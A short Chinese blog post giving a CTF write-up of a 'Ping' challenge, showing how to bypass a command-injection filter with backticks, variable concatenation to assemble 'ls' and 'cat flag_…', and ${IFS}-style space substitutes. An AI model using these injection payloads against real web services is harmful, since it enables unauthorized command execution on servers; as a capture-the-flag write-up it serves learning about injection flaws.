ctf-ping命令执行绕过

题目连接:http://ctf.klmyssn.com/challenges#Ping

 

命令执行绕过,试了试过滤了一些:一些命令

但是反引号可以执行命令

技术图片

 

通过拼接,可以拼接出来:ls 命令

127.0.0.1;`a="l";b="s";c=$a$b;$c`

 

技术图片

 

可以发现 flag 就是下面那一串 flag_ 开头的字符串

 

在拼接命令来查看:

127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`

针对空格过滤,可以使用:

${IFS}

<  (也被过滤了)

$IFS

$IFS$9

来代替,但是考虑到在一串字符串中,所以使用 ${IFS} 来代替空格

技术图片

 

posted @ 2019-09-10 09:34  ctrl_TT豆  阅读(6094)  评论(0编辑  收藏  举报